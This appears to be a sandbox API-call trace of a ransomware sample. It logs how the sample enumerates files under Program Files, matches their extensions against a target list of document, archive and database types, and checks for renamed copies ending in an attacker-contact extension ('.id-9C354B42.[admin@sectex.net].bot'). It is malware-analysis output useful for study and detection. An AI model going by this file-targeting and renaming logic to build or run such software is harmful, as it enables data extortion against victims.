	[0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.891] lstrlenW (lpString=".dbf") returned 4
	[0048.891] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.891] lstrlenW (lpString=".1cd") returned 4
	[0048.891] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.891] lstrlenW (lpString=".jpg") returned 4
	[0048.891] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.891] lstrlenW (lpString=".doc") returned 4
	[0048.891] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0048.891] lstrlenW (lpString=".docx") returned 5
	[0048.891] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0048.891] lstrlenW (lpString=".pdf") returned 4
	[0048.891] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0048.891] lstrlenW (lpString=".xls") returned 4
	[0048.891] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0048.891] lstrlenW (lpString=".xlsx") returned 5
	[0048.891] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0048.891] lstrlenW (lpString=".ppt") returned 4
	[0048.891] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.891] lstrlenW (lpString=".zip") returned 4
	[0048.891] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0048.891] lstrlenW (lpString=".rar") returned 4
	[0048.891] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0048.891] lstrlenW (lpString=".bz2") returned 4
	[0048.892] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0048.892] lstrlenW (lpString=".7z") returned 3
	[0048.892] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0048.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.892] lstrlenW (lpString=".dbf") returned 4
	[0048.892] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0048.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.892] lstrlenW (lpString=".1cd") returned 4
	[0048.892] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0048.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.892] lstrlenW (lpString=".jpg") returned 4
	[0048.892] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0048.892] lstrcmpiW (lpString1=".inc", lpString2=".bot") returned 1
	[0048.892] lstrlenW (lpString="adovbs.inc") returned 10
	[0048.892] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.892] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=14951) returned 1
	[0048.892] CloseHandle (hObject=0x1d0) returned 1
	[0048.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc")) returned 0x20
	[0048.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.893] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0048.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.893] lstrlenW (lpString=".doc") returned 4
	[0048.893] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0048.893] lstrlenW (lpString=".docx") returned 5
	[0048.893] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0048.893] lstrlenW (lpString=".pdf") returned 4
	[0048.893] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0048.893] lstrlenW (lpString=".xls") returned 4
	[0048.893] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0048.893] lstrlenW (lpString=".xlsx") returned 5
	[0048.893] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0048.893] lstrlenW (lpString=".ppt") returned 4
	[0048.893] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0048.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.893] lstrlenW (lpString=".zip") returned 4
	[0048.893] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0048.893] lstrlenW (lpString=".rar") returned 4
	[0048.893] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0048.893] lstrlenW (lpString=".bz2") returned 4
	[0048.893] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0048.893] lstrlenW (lpString=".7z") returned 3
	[0048.893] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0048.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.893] lstrlenW (lpString=".dbf") returned 4
	[0048.893] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0048.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.893] lstrlenW (lpString=".1cd") returned 4
	[0048.893] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0048.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.893] lstrlenW (lpString=".jpg") returned 4
	[0048.893] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0048.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.894] lstrlenW (lpString=".doc") returned 4
	[0048.894] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0048.894] lstrlenW (lpString=".docx") returned 5
	[0048.894] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0048.894] lstrlenW (lpString=".pdf") returned 4
	[0048.894] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0048.894] lstrlenW (lpString=".xls") returned 4
	[0048.894] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0048.894] lstrlenW (lpString=".xlsx") returned 5
	[0048.894] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0048.894] lstrlenW (lpString=".ppt") returned 4
	[0048.894] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0048.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.894] lstrlenW (lpString=".zip") returned 4
	[0048.894] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0048.894] lstrlenW (lpString=".rar") returned 4
	[0048.894] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0048.894] lstrlenW (lpString=".bz2") returned 4
	[0048.894] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0048.894] lstrlenW (lpString=".7z") returned 3
	[0048.894] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0048.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.894] lstrlenW (lpString=".dbf") returned 4
	[0048.894] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0048.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.894] lstrlenW (lpString=".1cd") returned 4
	[0048.894] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0048.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51
	[0048.894] lstrlenW (lpString=".jpg") returned 4
	[0048.894] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0048.895] lstrcmpiW (lpString1=".inc", lpString2=".bot") returned 1
	[0048.895] lstrlenW (lpString="adcjavas.inc") returned 12
	[0048.895] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0049.177] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=630) returned 1
	[0049.184] CloseHandle (hObject=0x1f0) returned 1
	[0049.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc")) returned 0x20
	[0049.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0049.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0049.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.184] lstrlenW (lpString=".doc") returned 4
	[0049.184] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0049.184] lstrlenW (lpString=".docx") returned 5
	[0049.184] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0049.184] lstrlenW (lpString=".pdf") returned 4
	[0049.184] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0049.184] lstrlenW (lpString=".xls") returned 4
	[0049.184] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0049.184] lstrlenW (lpString=".xlsx") returned 5
	[0049.184] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0049.184] lstrlenW (lpString=".ppt") returned 4
	[0049.184] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0049.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.185] lstrlenW (lpString=".zip") returned 4
	[0049.185] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0049.185] lstrlenW (lpString=".rar") returned 4
	[0049.185] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0049.185] lstrlenW (lpString=".bz2") returned 4
	[0049.185] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0049.185] lstrlenW (lpString=".7z") returned 3
	[0049.185] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0049.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.185] lstrlenW (lpString=".dbf") returned 4
	[0049.185] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0049.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.185] lstrlenW (lpString=".1cd") returned 4
	[0049.185] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0049.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.185] lstrlenW (lpString=".jpg") returned 4
	[0049.185] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0049.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.185] lstrlenW (lpString=".doc") returned 4
	[0049.185] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0049.185] lstrlenW (lpString=".docx") returned 5
	[0049.185] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0049.185] lstrlenW (lpString=".pdf") returned 4
	[0049.185] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0049.185] lstrlenW (lpString=".xls") returned 4
	[0049.185] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0049.185] lstrlenW (lpString=".xlsx") returned 5
	[0049.185] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0049.185] lstrlenW (lpString=".ppt") returned 4
	[0049.185] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0049.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.185] lstrlenW (lpString=".zip") returned 4
	[0049.186] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0049.186] lstrlenW (lpString=".rar") returned 4
	[0049.186] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0049.186] lstrlenW (lpString=".bz2") returned 4
	[0049.186] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0049.186] lstrlenW (lpString=".7z") returned 3
	[0049.186] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
	[0049.186] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.186] lstrlenW (lpString=".dbf") returned 4
	[0049.186] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1
	[0049.186] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.186] lstrlenW (lpString=".1cd") returned 4
	[0049.186] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1
	[0049.186] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55
	[0049.186] lstrlenW (lpString=".jpg") returned 4
	[0049.186] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1
	[0049.186] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0049.186] lstrlenW (lpString="BabyBoyMainBackground.wmv") returned 25
	[0049.186] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0050.232] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=341322) returned 1
	[0050.232] CloseHandle (hObject=0x1b0) returned 1
	[0050.232] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv")) returned 0x20
	[0050.232] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.232] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0050.232] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.232] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.232] lstrlenW (lpString=".doc") returned 4
	[0050.232] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0050.232] lstrlenW (lpString=".docx") returned 5
	[0050.232] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1
	[0050.232] lstrlenW (lpString=".pdf") returned 4
	[0050.232] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0050.233] lstrlenW (lpString=".xls") returned 4
	[0050.233] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0050.233] lstrlenW (lpString=".xlsx") returned 5
	[0050.233] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1
	[0050.233] lstrlenW (lpString=".ppt") returned 4
	[0050.233] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0050.233] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.233] lstrlenW (lpString=".zip") returned 4
	[0050.233] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0050.233] lstrlenW (lpString=".rar") returned 4
	[0050.233] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0050.233] lstrlenW (lpString=".bz2") returned 4
	[0050.233] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0050.233] lstrlenW (lpString=".7z") returned 3
	[0050.233] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0050.233] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.233] lstrlenW (lpString=".dbf") returned 4
	[0050.233] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0050.233] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.233] lstrlenW (lpString=".1cd") returned 4
	[0050.233] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0050.233] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.233] lstrlenW (lpString=".jpg") returned 4
	[0050.233] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0050.233] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.233] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.233] lstrlenW (lpString=".doc") returned 4
	[0050.233] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0050.233] lstrlenW (lpString=".docx") returned 5
	[0050.233] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1
	[0050.233] lstrlenW (lpString=".pdf") returned 4
	[0050.233] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0050.233] lstrlenW (lpString=".xls") returned 4
	[0050.233] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0050.234] lstrlenW (lpString=".xlsx") returned 5
	[0050.234] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1
	[0050.234] lstrlenW (lpString=".ppt") returned 4
	[0050.234] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0050.234] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.234] lstrlenW (lpString=".zip") returned 4
	[0050.234] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0050.234] lstrlenW (lpString=".rar") returned 4
	[0050.234] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0050.234] lstrlenW (lpString=".bz2") returned 4
	[0050.234] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0050.234] lstrlenW (lpString=".7z") returned 3
	[0050.234] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0050.234] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.234] lstrlenW (lpString=".dbf") returned 4
	[0050.234] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0050.234] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.234] lstrlenW (lpString=".1cd") returned 4
	[0050.234] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0050.234] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 77
	[0050.234] lstrlenW (lpString=".jpg") returned 4
	[0050.234] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0050.234] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0050.234] lstrlenW (lpString="16_9-frame-highlight.png") returned 24
	[0050.234] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0050.512] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=3122) returned 1
	[0050.512] CloseHandle (hObject=0x1c0) returned 1
	[0050.512] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png")) returned 0x20
	[0050.512] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.512] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0050.512] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.512] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.512] lstrlenW (lpString=".doc") returned 4
	[0050.512] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0050.512] lstrlenW (lpString=".docx") returned 5
	[0050.512] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1
	[0050.512] lstrlenW (lpString=".pdf") returned 4
	[0050.512] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0050.512] lstrlenW (lpString=".xls") returned 4
	[0050.512] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0050.512] lstrlenW (lpString=".xlsx") returned 5
	[0050.512] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1
	[0050.512] lstrlenW (lpString=".ppt") returned 4
	[0050.512] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0050.513] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.513] lstrlenW (lpString=".zip") returned 4
	[0050.513] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0050.513] lstrlenW (lpString=".rar") returned 4
	[0050.513] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0050.513] lstrlenW (lpString=".bz2") returned 4
	[0050.513] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0050.513] lstrlenW (lpString=".7z") returned 3
	[0050.513] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0050.513] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.513] lstrlenW (lpString=".dbf") returned 4
	[0050.513] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0050.513] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.513] lstrlenW (lpString=".1cd") returned 4
	[0050.513] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0050.513] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.513] lstrlenW (lpString=".jpg") returned 4
	[0050.513] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0050.513] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.513] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.513] lstrlenW (lpString=".doc") returned 4
	[0050.513] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0050.513] lstrlenW (lpString=".docx") returned 5
	[0050.513] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1
	[0050.513] lstrlenW (lpString=".pdf") returned 4
	[0050.513] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0050.513] lstrlenW (lpString=".xls") returned 4
	[0050.513] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0050.513] lstrlenW (lpString=".xlsx") returned 5
	[0050.513] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1
	[0050.513] lstrlenW (lpString=".ppt") returned 4
	[0050.513] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0050.513] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.513] lstrlenW (lpString=".zip") returned 4
	[0050.514] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0050.514] lstrlenW (lpString=".rar") returned 4
	[0050.514] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0050.514] lstrlenW (lpString=".bz2") returned 4
	[0050.514] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0050.514] lstrlenW (lpString=".7z") returned 3
	[0050.514] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0050.514] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.514] lstrlenW (lpString=".dbf") returned 4
	[0050.514] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0050.514] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned 77
	[0050.514] lstrlenW (lpString=".1cd") returned 4
	[0050.514] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
